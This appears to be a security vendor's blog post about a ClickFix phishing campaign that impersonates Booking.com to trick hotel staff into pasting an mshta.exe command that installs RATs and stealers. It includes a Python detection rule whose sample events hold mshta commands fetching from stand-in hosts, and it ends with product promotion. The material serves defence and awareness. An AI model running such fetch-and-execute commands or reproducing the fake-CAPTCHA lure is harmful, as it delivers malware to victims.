Individuals in the hospitality sector are being targeted in a sophisticated phishing scam that uses the ClickFix technique. The campaign has been active since at least December 2024 and has targeted individuals in North America, Europe, Oceania, and South and Southeast Asia.

The phishing emails impersonate Booking.com and target staff at hotels, guest houses, and other accommodation providers that are likely to work with Booking.com. A wide range of emails have been associated with this ClickFix campaign, including emails that appear to have been sent by prospective guests asking for advice about the accommodation, notifications from Booking.com about complaints from guests about previous stays, requesting feedback on the guests’ comments, and security notifications from Booking.com about suspicious login attempts.

While the lures are varied, they all use social engineering techniques to trick the recipient into clicking a link, which directs the user to a web page with a fake CAPTCHA overlaid on a visible background that appears to be the Booking.com website. The link may be added to the message body using anchor text to make it appear legitimate, or, in some of the emails, the link is added to a PDF file attachment in an effort to bypass email security solutions.

When the user attempts to complete the CAPTCHA prompt, they are advised of an error and are told they must use a keyboard shortcut (Windows key + R), then CTRL + V to paste a command into the Windows Run window, and press Enter to execute that command. The command copied to the clipboard will download and launch malicious code through mshta.exe, a legitimate Windows process. If the command is executed, it will lead to the delivery of malware such as AsyncRAT, VenomRAT, NetSupport RAT, Danabot, XWorm, and Lumma Stealer. Victims may get a cocktail of malware installed on their device.
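A defender-side illustration of the behavior described above, added here and not taken from TitanHQ or Microsoft: a command launched from the Run dialog has explorer.exe as its parent process, so mshta.exe started by explorer.exe with a remote URL in its command line is a strong hunting signal. The event records, host names, URLs, and field names below are constructed for the example.

```python
import re

# Constructed process-creation records (shaped like EDR/Sysmon process events).
# Hosts, paths and URLs are made up; the field names are an assumption.
SAMPLE_EVENTS = [
    {"host": "FRONTDESK-01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta.exe https://verify.example.invalid/check"},
    {"host": "FRONTDESK-02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe", "cmdline": r'mshta.exe "C:\Program Files\PMS\help.hta"'},
    {"host": "BACKOFFICE-03", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta.exe http://intranet.example.invalid/app.hta"},
    {"host": "FRONTDESK-01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
    {"host": "RESERVATIONS-04", "parent": r"C:\WINDOWS\Explorer.EXE",
     "image": r"C:\Windows\SysWOW64\MSHTA.EXE", "cmdline": 'MSHTA.EXE "HTTPS://verify.example.invalid/check"'},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path, so comparisons ignore case."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return (severity, url) for mshta.exe fetching remote content, else None."""
    if basename(event["image"]) != "mshta.exe":
        return None
    urls = URL_RE.findall(event["cmdline"])
    if not urls:
        return None  # local .hta file: out of scope for this rule
    # Run-dialog launches are children of explorer.exe: matches the ClickFix flow.
    if basename(event["parent"]) == "explorer.exe":
        return ("high", urls[0])
    # Remote mshta from any other parent is still worth a look.
    return ("medium", urls[0])

def scan(events):
    """Return (host, severity, url) for every event that matches the rule."""
    alerts = []
    for event in events:
        verdict = classify(event)
        if verdict:
            alerts.append((event["host"], *verdict))
    return alerts

if __name__ == "__main__":
    for host, severity, url in scan(SAMPLE_EVENTS):
        print(f"[{severity}] {host}: mshta.exe fetched {url}")
```
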

The campaign is being run by a threat actor tracked by Microsoft Threat Intelligence as Storm-1865. Storm-1865 is a financially motivated threat actor that primarily engages in payment data theft and fraudulent charges to victims’ accounts. After achieving its aims, the group may sell access to victims’ devices to other threat actors. Previous campaigns have used similar techniques and have involved messages sent through vendor platforms such as travel agencies, e-commerce platforms, and email services such as Gmail and iCloud Mail.

The ClickFix technique was first identified in October 2023 and has been adopted by several different threat actors, including financially motivated cybercriminal groups and nation-state actors from Russia and North Korea. The lures and malware may differ, but all use social engineering to trick the victim into running a command to fix a fictitious technical issue.

Businesses should ensure they have appropriate defenses to block phishing emails, as the ClickFix technique has proven to be highly effective. TitanHQ offers two solutions for blocking phishing attempts – the SpamTitan spam filtering service and the PhishTitan anti-phishing solution for Microsoft 365 users. The engine that powers both of these solutions was rated #1 out of all tested solutions in the Q4 2024 tests by Virus Bulletin, blocking 100% of phishing emails, 100% of malware, and 99.98% of spam emails. In the February 2025 tests, TitanHQ had a perfect score, blocking 100% of malware, phishing, and spam emails with a 0% false positive rate.

SpamTitan incorporates email sandboxing for behavioral analysis of emails and machine-learning algorithms to identify suspicious emails, ensuring an incredibly high detection rate. PhishTitan adds an extra layer of protection for Microsoft 365 accounts, augmenting Microsoft’s protections to identify and block the threats that Microsoft misses. Businesses should also ensure they provide security awareness training to the workforce and conduct phishing simulations of the ClickFix phishing technique. TitanHQ can help in this area with the SafeTitan security awareness training and phishing simulation platform. Call TitanHQ today for more information on phishing defense, or take advantage of the free trial of all of these solutions.